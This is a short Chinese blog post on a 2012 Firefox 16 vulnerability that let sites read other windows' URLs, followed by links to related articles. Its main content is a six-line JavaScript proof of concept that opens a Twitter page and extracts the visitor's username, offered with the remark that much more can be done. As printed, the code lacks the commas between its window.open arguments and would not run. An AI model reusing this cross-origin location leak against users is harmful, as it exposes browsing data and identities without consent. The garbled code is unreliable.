Firefox 16隐私漏洞的攻击方法

简介: 火狐浏览器前几天发布了最新的Firefox 16正式版,但是在刚发布一天,就爆出了重大安全漏洞,接着Mozilla在官方首页上移除了Firefox 16的下载链接,转而继续提供Firefox 15.0.1版本。
火狐浏览器前几天发布了最新的Firefox 16正式版,但是在刚发布一天,就爆出了重大安全漏洞,接着Mozilla在官方首页上移除了Firefox 16的下载链接,转而继续提供Firefox 15.0.1版本。

Mozilla这样解释:“该漏洞可能允许恶意网站获取用户的访问记录,窃取URL或URL参数,不过目前还没有迹象表明这个漏洞已经被人利用。”

下面是利用该漏洞获取用户信息的攻击代码,很简单,只需6行:


[javascript]   view plain copy print ?
  1. function poc(){  
  2.     var win = window.open('https://twitter.com/lists/''newWin''width=200, height=200');  
  3.     setTimeout(function(){  
  4.         alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])  
  5.     }, 5000);  
  6. }  

这个代码演示了使用Firefox 16的漏洞收集Twitter用户的用户名。当然,还可以干很多事!!!
目录
相关文章
|
2月前
|
Web App开发 搜索推荐 数据安全/隐私保护
|
Web App开发 安全 iOS开发
Firefox 3.6.3版率先修复黑客大赛所曝漏洞
火狐(Firefox)浏览器开发商Mozilla上周四晚些时候发布了火狐3.6.3版,该升级版修复了Pwn2Own全球黑客大赛中发现的一个危急技术漏洞。 在上周举行的Pwn2Own黑客大赛中,来自德国的参赛者“Nils”攻破了在Windows 7操作系统中运行的火狐3.6.2版,所获奖金为1万美元。
1048 0
|
Web App开发 安全
Mozilla正计划修复Firefox遗留8年的漏洞
Mozilla正计划修复Firefox 网页浏览器中存在了八年的错误。 据报道,在Firefox浏览器的层叠样式表(CSS)中的漏洞使得研发人员很容易从浏览器层叠样式表中获得用户已访问过的列表清单。
794 0
|
Web App开发 安全 测试技术
Firefox 3.6版本被证实确实存在0day漏洞
俄罗斯安全公司 Intevydis公司对Windows操作系统下的Firefox3.6版本实施了零日漏洞攻击测试。据悉,Windows操作系统下的Firebadger 3.6浏览器软件带有一个尚未明了的系统漏洞,该系统漏洞可以使得黑客远程获得对安装Windows操作系统的个人电脑实施控制。
794 0
|
Web App开发 安全
CNNVD有关火狐浏览器(Mozilla Firefox)漏洞情况的通报
本文讲的是CNNVD有关火狐浏览器(Mozilla Firefox)漏洞情况的通报,近日,国家信息安全漏洞库(CNNVD)收到北京长亭科技有限公司(CNNVD 技术支撑单位)关于火狐浏览器(Mozilla Firefox)数字错误漏洞(CNNVD-201703-910)情况的报送。
1490 0
|
7月前
|
Web App开发 Linux 数据安全/隐私保护
Docker本地部署Firefox火狐浏览器并远程访问
Docker本地部署Firefox火狐浏览器并远程访问